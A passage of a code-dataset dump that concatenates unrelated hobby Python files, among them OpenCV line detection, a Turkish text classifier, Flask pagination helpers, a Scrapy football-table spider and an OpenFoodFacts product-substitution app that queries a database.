rng\r\n\r\norg=cv2.imread('C:/Users/pulme/Downloads/Buoy.jpg')\r\nimg=cv2.cvtColor(org,cv2.COLOR_BGR2GRAY)\r\n#img=org[:,:,0]\r\ncv2.imshow(\"Img\",img)\r\nimg = cv2.GaussianBlur(img, (5,5), 0)\r\n#img = cv2.bilateralFilter(img,9,75,75)\r\n\r\nimg = cv2.adaptiveThreshold(img, 255,cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY_INV, 111, 12)\r\ncv2.imshow(\"Mean Thresh\", img)\r\nkernel = np.ones((9,9),np.uint8)\r\nerosion = cv2.erode(img,kernel,iterations = 2)\r\ndilation = cv2.dilate(erosion,kernel,iterations =2 )\r\n#opening = cv2.morphologyEx(dilation, cv2.MORPH_OPEN, kernel)\r\nedges = cv2.Canny(dilation, 190, 255)\r\ncv2.imshow(\"Canny\", edges)\r\n\r\nminLineLength = 5\r\nmaxLineGap = 5\r\nlines = cv2.HoughLinesP(edges,60,np.pi/180,300,minLineLength,maxLineGap)\r\nfor line in lines:\r\n x1,y1,x2,y2=line[0]\r\n cv2.line(org,(x1,y1),(x2,y2),(0,0,255),2)\r\n\r\n\r\n#lines = cv2.HoughLines(edges,10,np.pi/45,50)\r\n#for line in lines:\r\n# rho,theta=line[0]\r\n# a = np.cos(theta)\r\n# b = np.sin(theta)\r\n# x0 = a*rho\r\n# y0 = b*rho\r\n# x1 = int(x0 + 1000*(-b))\r\n# y1 = int(y0 + 1000*(a))\r\n# x2 = int(x0 - 1000*(-b))\r\n# y2 = int(y0 - 1000*(a))\r\n#\r\n# cv2.line(org,(x1,y1),(x2,y2),(0,255,0),2)\r\n\r\ncv2.imshow(\"Hough\",org)\r\n\r\n\r\n\r\n#contours, _ = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n##print(\"I count {} contours in this image\".format(len(contours)))\r\n##cons = org.copy()\r\n##cv2.drawContours(cons, contours, -1, (0, 255, 0), 2)\r\n##cv2.imshow(\"Contours\", cons)\r\n\r\n\r\n#contours_poly = [None]*len(contours)\r\n#boundRect = [None]*len(contours)\r\n#cir=[None]*len(contours)\r\n#area=[None]*len(contours)\r\n#def get_contour_center(contours):\r\n# M = cv2.moments(contours)\r\n# cx=-1\r\n# cy=-1\r\n# if (M['m00']!=0):\r\n# cx= int(M['m10']/M['m00'])\r\n# cy= int(M['m01']/M['m00'])\r\n# return cx, cy\r\n#for i, c in enumerate(contours):\r\n# area[i] = cv2.contourArea(c)\r\n## perimeter= cv2.arcLength(c, True)\r\n# contours_poly[i] = cv2.approxPolyDP(c, 3, True)\r\n# boundRect[i] = cv2.boundingRect(contours_poly[i])\r\n# cir[i] = get_contour_center(c)\r\n### \r\n#index=area.index(max(area))\r\n#drawing = np.zeros((edges.shape[0], edges.shape[1], 3), dtype=np.uint8) \r\n### #centers[i], radius[i] = cv.minEnclosingCircle(contours_poly[i])\r\n### \r\n### \r\n##for i in range(len(contours)):\r\n#color = (rng.randint(0,256), rng.randint(0,256), rng.randint(0,256))\r\n#cv2.drawContours(drawing, contours_poly, index, color)\r\n#cv2.rectangle(drawing, 
(int(boundRect[index][0]), int(boundRect[index][1])), (int(boundRect[index][0]+boundRect[index][2]), int(boundRect[index][1]+boundRect[index][3])), (0,255,0), 2)\r\n#rcx=int(boundRect[index][0]+boundRect[index][2]/2)\r\n#rcy=int(boundRect[index][1]+boundRect[index][3]/2)\r\n#cv2.circle(drawing, (rcx,rcy), 2, (0, 255, 0), -1)\r\n### \r\n#res = cv2.resize(drawing,None,fx=0.5, fy=0.5, interpolation = cv2.INTER_CUBIC)\r\n#cv2.imshow('Contours1', res)\r\n# print (\"Area: {}, Perimeter: {}\".format(area, perimeter))\r\n#res1 = cv2.resize(org,None,fx=0.5, fy=0.5, interpolation = cv2.INTER_CUBIC) \r\n#cv2.imshow(\"Original\",res1)\r\n#cv2.imshow(\"Erode\",erosion)\r\n#cv2.imshow(\"Opening\",opening)\r\n#cv2.imshow(\"Contours\", cons)\r\n#cv2.resize(erosion, None, fx=0.3, fy=0.3)\r\n#cv2.resize(opening, None, fx=0.3, fy=0.3)\r\n#cv2.resize(cons, None, fx=0.3, fy=0.3)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","sub_path":"hough.py","file_name":"hough.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"168329034","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 26 23:37:09 2020\r\n\r\n@author: Bjorn Funk\r\n\"\"\"\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport Fluids\r\nimport kinetics as tempf\r\nimport heattransfer1 as ht1\r\n\r\n#pressureF = Fluids.function(tempf.fun('T'),ht1.fun)[0]\r\npressureF = Fluids.function(500,450)[0]#DELETE and use ^\r\n#pressureC = Fluids.function(ht1.fun,ht2.fun)[0]\r\npressureC = Fluids.coolant(500,450)[0] #DELETE and use ^\r\n\r\n\r\nlineWidth = 20\r\nwordLoc = 0\r\n\r\nimage = Image.open('FluidsModel.png')\r\ndraw = ImageDraw.Draw(image)\r\n\r\nfontA = ImageFont.truetype('arial.ttf',20)\r\ndraw.text(xy = (0,wordLoc),text = \"Fuel Loop(Pa)\",fill = (0,0,0),font = fontA)\r\n\r\nfor i in range(len(pressureF)):\r\n wordLoc += lineWidth\r\n pressureF[i] = round(pressureF[i])\r\n draw.text(xy = (0,wordLoc),text = \"Pressure F\" +str(i)+\": \"+str(pressureF[i]),fill = (0,0,0),font = fontA)\r\n\r\nwordLoc += 2*lineWidth\r\n\r\ndraw.text(xy = (0,wordLoc),text = \"Coolant Loop(Pa)\",fill = (0,0,0),font = fontA)\r\nfor i in range(len(pressureC)):\r\n wordLoc += lineWidth\r\n pressureC[i] = round(pressureC[i])\r\n draw.text(xy = (0,wordLoc),text = \"Pressure C\" +str(i)+\": \"+str(pressureC[i]),fill = (0,0,0),font = fontA)\r\n \r\nimage.save('FluidsModelNew.png')\r\n","sub_path":"Test Run Mar 29/FluidsGUI.py","file_name":"FluidsGUI.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"471367431","text":"import jpype\nimport pandas as pd\nimport numpy as np\nimport nltk\nimport re\nimport nltk as nlp\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom nltk.corpus import stopwords\n\nnltk.download('punkt')\n\njpype.startJVM(jpype.getDefaultJVMPath(),\"-Djava.class.path=/home/x/Desktop/zemberek-tum-2.0.jar\",\"-ea\")\nTr = jpype.JClass(\"net.zemberek.tr.yapi.TurkiyeTurkcesi\")\ntr = Tr()\n\nZemberek = jpype.JClass(\"net.zemberek.erisim.Zemberek\")\nzemberek = Zemberek(tr)\n\ndata = pd.read_csv(r\"dataset.csv\", encoding=\"UTF-8\")\n\ndata.Kategori = [1 if each == \"Spor\" else 2 if each == \"Teknoloji\" else 3 if each == \"Ekonomi\" else 0 for each in data.Kategori]\nKategori = data.Kategori\n\nİçerik = data.İçerik\ndata.İçerik = 
np.array(data.İçerik)\n\ndf_docs = pd.DataFrame({'Sinif': Kategori,'Dokuman': İçerik})\ndf_docs = df_docs[['Sinif', 'Dokuman']]\n\nnltk.download('stopwords')\nstopWords = set(stopwords.words('turkish'))\n\nWPT = nltk.WordPunctTokenizer()\n\nstop_word_list = nltk.corpus.stopwords.words('turkish')\nstop_word = ['abd', 'ancak', 'artık', 'ama', 'asla', 'aynı', 'b', 'bazı', 'bana', 'bazen', 'bazıları', 'bazısı', 'ben',\n 'beni', 'benim', 'beş', 'bile', 'bin', 'bir', 'birçoğu', 'birçok', 'birçokları', 'biri', 'birisi',\n 'birkaçı',\n 'birşey', 'birşeyi', 'biz', 'bize', 'bizi', 'bizim', 'böyle', 'böylece', 'bu', 'buna', 'bunda', 'bundan',\n 'bunu', 'bunun', 'burada', 'bütün', 'çoğu', 'çoğuna', 'çoğunu', 'd', 'değil', 'demek', 'diğer', 'diğeri',\n 'diğerleri', 'diye', 'dolayı', 'elbette', 'fakat', 'falan', 'felan', 'filan', 'gene', 'geri', 'göre',\n ' hangi', 'hangisi', 'hani', 'hatta', 'henüz', 'hepsine', 'hepsini', 'her biri', 'herkes', 'herkese',\n 'herkesi', 'hiç kimse', 'hiçbiri', 'hiçbirine', 'hiçbirini', 'i', 'ı', 'ilk', 'içinde', 'işte', 'iken',\n 'ila', 'ileri', 'iyi', 'kaç', 'kadar', 'kendi', 'kendine', 'kendini', 'kime', 'kimi', 'kimin', 'kimisi',\n 'ler', 'lar', 'madem', 'mi', 'ne kadar', 'ne zaman', 'nedir', 'nereden', 'nesi', 'neyse', 'ö', 'ona',\n 'ondan', 'onlar', 'onlara', 'onlardan', 'onların', 'onu', 'onun', 'orada', 'oysa', 'oysaki', 'öbürü',\n 'ön', 'önce', 'ötürü', 'öyle', 'peki', 'sana', 'sen', 'senden', 'seni', 'senin', 'sizden', 'size', 'sizi',\n 'sizin', 'son', 'sonra', 'şayet', 'şimdi', 'şöyle', 'şuna', 'şunda', 'şundan', 'şunlar', 'şunu', 'şunun',\n 'tabi', 'tamam', 'tümü', 'u', 'ü', 'üzere', 'var', 'vb', 'veyahut', 'ya da', 'yerine', 'yine', 'yoksa',\n 'zaten', 'zira']\n\nstop_word_list.extend(stop_word)\n\nDocument_list = pd.DataFrame(columns=['Kategori', 'İçerik'], index=range(20))\ni=0\nfor İçerik in data.İçerik:\n İçerik = re.sub(\"[^abcçdefgğhıiklmnoöprsştuüvyzABCÇDEFGĞHIİJKLMNOÖPRSŞTUÜVYZ]\", \" \", İçerik)\n \"\"\"İçerik = İçerik.lower()\"\"\"\n İçerik = nltk.word_tokenize(İçerik)\n İçerik = [kelime for kelime in İçerik if not kelime in set(stop_word_list)]\n lemma = nlp.WordNetLemmatizer()\n İçerik = [lemma.lemmatize(kelime) for kelime in İçerik]\n \n bos = []\n \n for kelime in İçerik:\n\n if kelime.strip() > '':\n yanit = zemberek.kelimeCozumle(kelime)\n \n if yanit:\n bos.append(zemberek.kelimeCozumle(kelime)[0].kok().icerik()) \n Document_list.Kategori[i] = data.Kategori[i]\n Document_list.İçerik[i] = bos\n \"\"\"Document_list.İçerik[i] = \" \".join(Document_list.İçerik[i])\"\"\"\n\njpype.shutdownJVM()\n\nmax_features = 1000\ncount_vectorizer = CountVectorizer(max_features)\nmatrix = count_vectorizer.fit_transform(Document_list.İçerik).toarray()\n\nx = matrix\ny = data.iloc[:, 0:1].values\n\nx_train, x_test = train_test_split(x, test_size=0.2)\ny_train, y_test = train_test_split(y, test_size=0.2)\n\nnb = GaussianNB()\n\n\nnb.fit(x_train, y_train)\n\nx_pred = nb.predict(y_test)\n\ndef tahminOutput(index): \n if index == 0:\n kategori = 'SPOR'\n elif index == 1:\n kategori = 'TEKNOLOJİ'\n elif index == 2:\n kategori = 'EKONOMİ'\n else:\n kategori = 'EĞİTİM'\n\n return kategori\n\n\n\ntahmin0 = tahminOutput(x_pred[0])\ntahmin1 = tahminOutput(x_pred[1])\ntahmin2 = tahminOutput(x_pred[2])\ntahmin3 = tahminOutput(x_pred[3])\n\n\nprint('\\n\\n\\n\\n*************************************')\nprint('*************************************')\n\n\nprint('1. YAZI TAHMİNİ : ', tahmin0)\nprint('--------------------------------------')\n\nprint('2. 
YAZI TAHMİNİ : ', tahmin1)\nprint('--------------------------------------')\n\nprint('3. YAZI TAHMİNİ : ', tahmin2)\nprint('--------------------------------------')\n\nprint('4. YAZI TAHMİNİ : ', tahmin3)\n\nprint('*************************************')\nprint('*************************************')\n\n","sub_path":"ml2.py","file_name":"ml2.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"229187628","text":"#!/usr/bin/env python\n'''\nioos_catalog/util.py\nA python module containing useful methods\n'''\n\nfrom urllib import urlencode\nfrom flask import request\nfrom math import ceil\n\ndef build_links(item_count, current_page, page_limit, query=None):\n '''\n Returns a list of RFC-5988 compliant links given the pagination information\n https://github.com/davidcelis/api-pagination\n http://tools.ietf.org/html/rfc5988\n\n :param int item_count: Total number of items or records\n :param int current_page: The current page number (starting with 0)\n :param int page_limit: Total number of pages\n :param dict query: The additional query parameters that should be used to construct the URL\n :return: list of RFC-5988 compliant links\n :rtype: list\n '''\n base_url = request.url.split('?')[0]\n query = query or {}\n links = []\n last_page_count = int(ceil(item_count * 1.0 / page_limit))\n if current_page < last_page_count:\n links.append(build_link(base_url, query, current_page+2, 'next'))\n links.append(build_link(base_url, query, 1, 'first'))\n if current_page > 0:\n links.append(build_link(base_url, query, current_page, 'prev'))\n links.append(build_link(base_url, query, last_page_count, 'last'))\n return links\n\ndef build_link(base_url, query, page, rel):\n '''\n Returns a RFC-5988 compliant link\n :param str base_url: Base URL\n :param dict query: The URL query parameters\n :param int page: The page number\n :param str rel: The rel text\n :return: RFC-5988 compliant link\n :rtype: str\n '''\n query['page'] = page\n return '<%s>; rel=\"%s\"' % (build_url(base_url, query), rel)\n\n\ndef build_url(url, query):\n '''\n If a query exists it concatenates the query string to the URL\n :param str url: URL\n :param dict query: URL Query parameters\n '''\n if query:\n url += '?' 
+ urlencode(query)\n return url\n","sub_path":"ioos_catalog/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"556404274","text":"import datetime\nfrom sqlalchemy import Column, String, Boolean, DateTime, Integer, Text\nimport base.common.orm\n\n\nclass MailQueue(base.common.orm.sql_base):\n\n __tablename__ = 'mail_queue'\n __table_args__ = {'sqlite_autoincrement': True}\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n subject = Column(String(128), index=True, nullable=False)\n sender_name = Column(String(128), nullable=False)\n sender = Column(String(128), index=True, nullable=False)\n receiver_name = Column(String(128), nullable=False)\n receiver = Column(String(128), nullable=False)\n time_created = Column(DateTime, nullable=False, default=datetime.datetime.now())\n time_sent = Column(DateTime)\n sent = Column(Boolean, index=True, nullable=False, default=True)\n message = Column(Text, nullable=False)\n data = Column(Text)\n\n def __init__(self, sender, sender_name, receiver, receiver_name, subject, message, data=None):\n\n self.sender = sender\n self.sender_name = sender_name\n if not self.sender_name:\n self.sender_name = sender\n self.receiver = receiver\n self.receiver_name = receiver_name\n if not self.receiver_name:\n self.receiver_name = receiver\n self.subject = subject\n self.message = message\n self.data = data\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"base2/bdays/src/models/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"125764212","text":"from app.doc import parameter, JWT_ACCESS_TOKEN\n\nSIGNUP_POST = {\n 'tags': ['Account'],\n 'description': '회원가입',\n 'parameters': [\n parameter('name', '이름'),\n parameter('id', '사용자 아이디'),\n parameter('password', '사용자 비밀번호')\n ],\n 'responses': {\n '201': {\n 'description': '가입 완료'\n },\n '205': {\n 'description': '가입 불가능(중복된 ID)'\n }\n }\n}\n\nADDITIONAL_PATCH = {\n 'tags': ['Account'],\n 'description': '추가 세부 내용',\n 'parameters': [\n JWT_ACCESS_TOKEN,\n parameter('gender', '이름'),\n parameter('age', '나이'),\n parameter('address', '주소'),\n parameter('intro', '한 줄 소개'),\n ],\n 'responses': {\n '201': {\n 'description': '추가 완료'\n },\n '205': {\n 'description': '없는 ID'\n }\n }\n}","sub_path":"Server/app/doc/signup.py","file_name":"signup.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"320287003","text":"from scrapy import Spider\nfrom EPL_table.items import EPLTableItem\nfrom scrapy import Request\nimport re\n\n\nclass EPLSpider(Spider):\n name = 'EPL_Table_spider'\n allowed_urls = ['https://www.transfermarkt.co.uk/']\n start_urls = ['https://www.transfermarkt.co.uk/']\n \n\n def parse(self, response):\n # List comprehension to generate all the urls for each page for the league season\n league_position_urls = ['https://www.transfermarkt.co.uk/premier-league/startseite/wettbewerb/GB1/plus/?saison_id={}'.format(x) for x in range(1997, 2019)] \n for url in league_position_urls:\n yield Request(url=url, callback=self.parse_league_table_page)\n\n def parse_league_table_page(self, response):\n #this function parses through the page to get information from the final league table for the season\n Season = 
response.xpath('//*[@id=\"wettbewerbsstartseite\"]/div[2]//div[@class=\"table-header\"]/text()').extract_first()\n\n Season = ''.join(re.findall('\\d+/\\d+', Season))\n # looping through each row of the table\n for i in range (1,21):\n #main xpath for each row\n row = response.xpath('//*[@id=\"wettbewerbsstartseite\"]/div[2]//tbody/tr[{}]'.format(i))\n #linked xpaths for each item to scrape\n Position =row.xpath('.//td[@class=\"rechts hauptlink nowrap\"]/text()').extract_first()\n \n Club = row.xpath('.//td[@class=\"no-border-links hauptlink\"]/a/text()').extract_first()\n \n if len(row.xpath('.//td[@class=\"zentriert\"]/text()').extract())> 3:\n Goal_Difference = row.xpath('.//td[@class=\"zentriert\"]/text()').extract()[2]\n Points = row.xpath('.//td[@class=\"zentriert\"]/text()').extract()[3]\n else:\n Goal_Difference = row.xpath('.//td[@class=\"zentriert\"]/text()').extract()[1]\n Points = row.xpath('.//td[@class=\"zentriert\"]/text()').extract()[2]\n\n Position = int(Position)\n Goal_Difference = int(Goal_Difference)\n Points = int(Points)\n \n # print(Season)\n # print(Club)\n # print(Position)\n # print(Goal_Difference)\n # print(Points)\n item = EPLTableItem()\n item['Season'] = Season \n item['Club'] = Club\n item['Position'] = Position\n item['Goal_Difference'] = Goal_Difference\n item['Points'] = Points\n yield item\n\n\n","sub_path":"Scrapping/Spiders/EPL_table/EPL_table/spiders/EPL_Table_spider.py","file_name":"EPL_Table_spider.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"519676742","text":"\"\"\" Defines the User repository \"\"\"\n\nfrom models import User, Email, PhoneNumber\n\n\nclass UserRepository:\n \"\"\" The repository for the user model \"\"\"\n\n @staticmethod\n def get(user_id):\n \"\"\" Query a user by user_id\"\"\"\n return User.query.filter_by(id=user_id).one()\n\n def update(self, user_id, last_name=None, first_name=None, emails=None, phone_numbers=None):\n \"\"\" Update a user's info \"\"\"\n user = self.get(user_id)\n if last_name:\n user.last_name = last_name\n if first_name:\n user.first_name = first_name\n\n if emails:\n old_emails = Email.query.filter_by(id=user_id).all()\n for old_email in old_emails:\n old_email.delete()\n self.add(user_id, emails=emails)\n\n if phone_numbers:\n old_numbers = PhoneNumber.query.filter_by(id=user_id).all()\n for old_number in old_numbers:\n old_number.delete()\n self.add(user_id, phone_numbers=phone_numbers)\n\n return user.save()\n\n def add(self, user_id, emails=None, phone_numbers=None):\n \"\"\" Add emails or phone numbers\"\"\"\n user = self.get(user_id)\n\n if emails:\n for mail in emails:\n email_obj = Email.query.filter_by(id=user_id).one()\n email_obj.mail = mail\n email_obj.save()\n if phone_numbers:\n for number in phone_numbers:\n number_obj = PhoneNumber.query.filter_by(id=user_id).one()\n number_obj.number = number\n number_obj.save()\n return user.save()\n\n @staticmethod\n def create(last_name, first_name, emails=None, phone_numbers=None):\n \"\"\" Create a new user \"\"\"\n user = User(last_name=last_name, first_name=first_name)\n if emails:\n for email in emails:\n Email(mail=email, user_id=user.id).save()\n if phone_numbers:\n for number in phone_numbers:\n PhoneNumber(number=number, user_id=user.id).save()\n return user.save()\n\n def delete(self, user_id):\n \"\"\" Delete a user \"\"\"\n user = self.get(user_id).delete()\n\n return 
user\n","sub_path":"src/repositories/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"278560720","text":"#!/usr/bin/env python\nimport web\nimport plot_speedtest\n\nPLOT_NAME = '/tmp/speedtest_logs/bandwidth.png'\n\nurls = (\n'/bandwidth', 'showplot',\n)\n\nclass showplot:\n def GET(self):\n plot_speedtest.create_plot(PLOT_NAME)\n web.header(\"Content-Type\", 'image/png') # set HTTP header\n return open(PLOT_NAME,\"rb\").read() # open image for reading\n \n app = web.application(urls, globals())\n if __name__ == \"__main__\":\n app.run()","sub_path":"serve_to_web.py","file_name":"serve_to_web.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"70154544","text":"#!/usr/bin/python3\n# coding: Utf-8\n\n\"\"\"\nApp : PyFood - OpenFoodFacts\nFile : api_openfoodfacts.py\nCreator : Grégory Le Terte\nInfo : Get list product OpenFoodFacts\n\"\"\"\nimport requests\nfrom constants import *\nfrom colorama import Fore\nfrom random import randint\n\n\nclass Api:\n def __init__(self, cursor):\n\n self.category = list()\n self.products = list()\n self.substitue = list()\n self.cleaned_products = list()\n\n self.url = OPENFOODFACTS_URL\n self.pages = OPENFOODFACTS_FIELDS\n self.mycursor = cursor\n\n self.categorie_name = \"\"\n self.categorie_id = \"\"\n\n def get_products(self):\n \"\"\"\n This method make a request via the API\n to get a list of products.\n \"\"\"\n\n nb_categorie = self.detailbase()\n\n if nb_categorie == 0:\n print(MENU_IMPORT)\n for page in range(1, 2):\n\n # page-by-page processing\n self.pages['page'] = page\n products_request = requests.get(self.url, self.pages)\n products = products_request.json()\n\n # Take only usefull informations\n for element in products['products']:\n for cat in CATEGORY_OK:\n catsplit = element[\"categories\"].split(\",\")\n for catoff in catsplit:\n if cat in catoff:\n if not all(tag in element for tag in (\n \"product_name\", \"brands\", \"nutrition_grade_fr\",\n \"url\",\n \"stores\", \"countries\", \"categories\")):\n continue\n elif element[\"categories\"][:3] == \"fr:\":\n continue\n\n self.cleaned_products.append(element)\n\n page += 1\n\n self.add_products()\n self.detailbase()\n\n def add_products(self):\n \"\"\"\n This method is a loop which products will be\n put into the database\n \"\"\"\n\n for element in self.cleaned_products:\n # character deletion \" ' \"\n\n element['product_name'] = cleaned_value(element['product_name'])\n element['brands'] = cleaned_value(element['brands'])\n element['stores'] = cleaned_value(element['stores'])\n element['countries'] = cleaned_value(element['countries'])\n element['product_name'] = element['product_name'].strip()\n\n sql_select = \"SELECT id FROM Products where name='\" + str(\n element['product_name']) + \"'\"\n\n # Execute Query.\n resultat, count = self.mycursor.select_request(sql_select)\n if count == 0:\n self.categorie_name = element['categories']\n id_categorie = self.add_categories()\n\n sql = \"INSERT INTO Products(name, id_category, brands,\" \\\n \" nutriscore,link, shop, country) VALUES('\" + \\\n str(element['product_name']) + \"',\" + \\\n str(id_categorie) + \",'\" + \\\n str(element['brands']) + \"','\" + \\\n str(element['nutrition_grade_fr']) + \"','\" + \\\n str(element['url']) + \"','\" + \\\n str(element['stores']) + \"','\" + \\\n str(element['countries']) + 
\"')\"\n self.mycursor.execute_request(sql)\n\n def add_categories(self):\n\n # SQL\n slist_categorie = self.categorie_name.split(',')\n element = slist_categorie[0].replace(\"'\", \" \")\n\n sql_select = \"SELECT id FROM Category where name='\" + element + \"'\"\n resultat, count = self.mycursor.select_request(sql_select)\n\n if count == 0:\n # Execute Query Insert Category\n sql_insert = \"INSERT INTO Category (name) VALUES \" \\\n \"('\" + element+ \"')\"\n self.mycursor.execute_request(sql_insert)\n\n # Execute Query for keep Id Category\n resultat, count = self.mycursor.select_request(sql_select)\n\n for resul in resultat:\n return resul[0]\n\n def detailbase(self):\n\n scategories = \"\"\n sproducts = \"\"\n sprodsub = \"\"\n ncat = 0\n resultat, count = self.mycursor.select_request(BDD_COUNT_CAT)\n for res in resultat:\n ncat = res[0]\n scategories = str(res[0]) + \" Catégories\"\n\n resultat, count = self.mycursor.select_request(BDD_COUNT_PRODUCTS)\n for res in resultat:\n sproducts = str(res[0]) + \" Produits\"\n\n resultat, count = self.mycursor.select_request(BDD_COUNT_SAVED)\n for res in resultat:\n sprodsub = str(res[0]) + \" Produits substitués \"\n\n print(MENU_BLANC)\n print(\n Fore.WHITE + MENU_ENTETE1.format(scategories, sproducts, sprodsub))\n print(MENU_BLANC)\n\n return ncat\n\n def del_table(self):\n\n self.mycursor.execute_request(BDD_DELETE_SAVED)\n self.mycursor.execute_request(BDD_DELETE_PRODUCTS)\n self.mycursor.execute_request(BDD_DELETE_CAT)\n self.mycursor.close_database()\n\n def show_categories(self):\n \"\"\" This method shows all the category.\"\"\"\n\n self.category = []\n sql_select = \"SELECT * FROM Category\"\n resultat, count = self.mycursor.select_request(sql_select)\n nbcat = 0\n nb_prod = 0\n if count > 0:\n for result in resultat:\n # on compte le nombre de produits par categorie\n\n sql_select = RQ_SHOW4.format(result[0])\n resultat, count = self.mycursor.select_request(sql_select)\n\n for resul1 in resultat:\n nb_prod = resul1[0]\n\n if nb_prod > 1:\n nb_prod = \"(\" + str(nb_prod) + \") Produits\"\n nbcat += 1\n print(Fore.WHITE + '\\t ' + str(nbcat) + \" -\" + str(\n result[1]) + nb_prod)\n self.category.append(result[0])\n\n return nbcat\n\n def show_products(self, id_cat):\n \"\"\" This method shows all the category.\"\"\"\n\n nbproduct = 0\n\n sql_select = \"SELECT Id,name,nutriscore FROM Products where id_\" \\\n \"category='\" + str(self.category[id_cat]) + \\\n \"' ORDER BY nutriscore\"\n resultat, count = self.mycursor.select_request(sql_select)\n\n for result in resultat:\n nbproduct += 1\n slibref = result[1]\n slibref = repr(slibref.replace('\\n', ''))\n slibref = slibref.replace(\"'\", \"\")\n if len(slibref) > 79: # limit 80 caract\n slibref = slibref[0:78] + \".\"\n\n print(Fore.WHITE + MENU1_TEXT2.format(str(nbproduct), str(slibref),\n color_nutriscore(result[2])))\n self.products.append(result[0])\n\n return nbproduct\n\n def show_products_substitue(self, id_cat, id_product):\n \"\"\" This method shows all the category.\"\"\"\n letter_base = 0\n sql_select = RQ_SHOW1.format(self.category[id_cat],\n self.products[id_product])\n resultat, count = self.mycursor.select_request(sql_select)\n for result in resultat:\n letter_base = result[0]\n\n sql_select = RQ_SHOW2.format(self.category[id_cat],\n self.products[id_product])\n resultat, count = self.mycursor.select_request(sql_select)\n\n pos_nutri_base = int(1 + NUSTRICORE.index(letter_base))\n nbsubtitue = 0\n\n # number of articles with superior quality\n nbsubtituetotal=0\n for 
result in resultat:\n pos_nutri = int(1 + NUSTRICORE.index(result[2]))\n if pos_nutri < pos_nutri_base:\n nbsubtituetotal += 1\n\n # we select an item at random\n article_found = 0\n if nbsubtituetotal>0:\n chiffre_hasard = randint(1, nbsubtituetotal)\n nbsubtitue=0\n\n\n for result in resultat:\n pos_nutri = int(1 + NUSTRICORE.index(result[2]))\n if pos_nutri < pos_nutri_base:\n nbsubtitue += 1\n\n if int(chiffre_hasard)==int(nbsubtitue):\n article_found = 1\n slibref = str(result[1])\n slibref = repr(slibref.replace('\\n', ''))\n slibref = slibref.replace(\"'\", \"\")\n\n lien_int = str(result[3])\n\n if len(slibref) > 79: # limit 80 caract\n slibref = slibref[0:79] + \".\"\n\n if len(lien_int) > 79: # limit 80 caract\n lien_int = lien_int[0:80]\n\n # Display random nutriscore\n print(MENU_BLANC)\n print(Fore.YELLOW + MENU1_TEXT4.format(nbsubtituetotal,\n letter_base.upper()))\n print(Fore.WHITE + MENU1_TEXT3.format(str(nbsubtitue),\n slibref,\n color_nutriscore(\n result[2]),\n lien_int,\n Fore.WHITE + str(\n result[4])))\n\n self.substitue.append(result[0])\n\n return article_found\n\n def save_article(self, id_prod_origin, id_prod_category):\n\n sql = \"INSERT INTO Saved(id_product_origin, id_product_substitue) \" \\\n \"VALUES(\" + str(self.products[id_prod_origin]) + \\\n \",\" + str(self.substitue[id_prod_category]) + \")\"\n self.mycursor.execute_request(sql)\n print(Fore.YELLOW + '\\t ' + \"Enregistrement effectué\")\n\n def list_articles_substitues(self):\n sql_select = \"SELECT * FROM Saved\"\n resultat, count = self.mycursor.select_request(sql_select)\n for result in resultat:\n sref_origin = result[1]\n sref_substitue = result[2]\n\n sql_select = RQ_SHOW3.format(str(sref_origin))\n resultat, count = self.mycursor.select_request(sql_select)\n for result0 in resultat:\n sref_origin = Fore.WHITE+\"Article d'origine : \" + \\\n str(result0[0])+\" (\"+\\\n color_nutriscore(result0[1])+Fore.WHITE+\")\"\n\n sql_select = RQ_SHOW3.format(str(sref_substitue))\n resultat, count = self.mycursor.select_request(sql_select)\n for result1 in resultat:\n sref_substitue = Fore.WHITE+\"Article Substitué : \" +\\\n str(result1[0])+\" (\"+\\\n color_nutriscore(result1[1])+Fore.WHITE+\")\"\n\n\n print(MENU_BLANC)\n print(Fore.WHITE + \"\\t \" + sref_origin + \" | \" + sref_substitue)\n\n\ndef color_nutriscore(nutriscore_value):\n nutriscore_value = str(nutriscore_value.upper())\n\n if nutriscore_value == \"A\":\n nutriscore_value = Fore.GREEN + nutriscore_value\n else:\n if nutriscore_value == \"B\":\n nutriscore_value = Fore.WHITE + nutriscore_value\n else:\n if nutriscore_value == \"C\":\n nutriscore_value = Fore.YELLOW + nutriscore_value\n else:\n nutriscore_value = Fore.RED + nutriscore_value\n\n return nutriscore_value\n\n\ndef cleaned_value(clean_value):\n return clean_value.replace(\"'\", \" \")\n","sub_path":"src/api_openfoodfacts.py","file_name":"api_openfoodfacts.py","file_ext":"py","file_size_in_byte":11926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"400116286","text":"# coding: utf-8\n\n\"\"\"\n Pure Storage FlashBlade REST 1.11 Python SDK\n\n Pure Storage FlashBlade REST 1.11 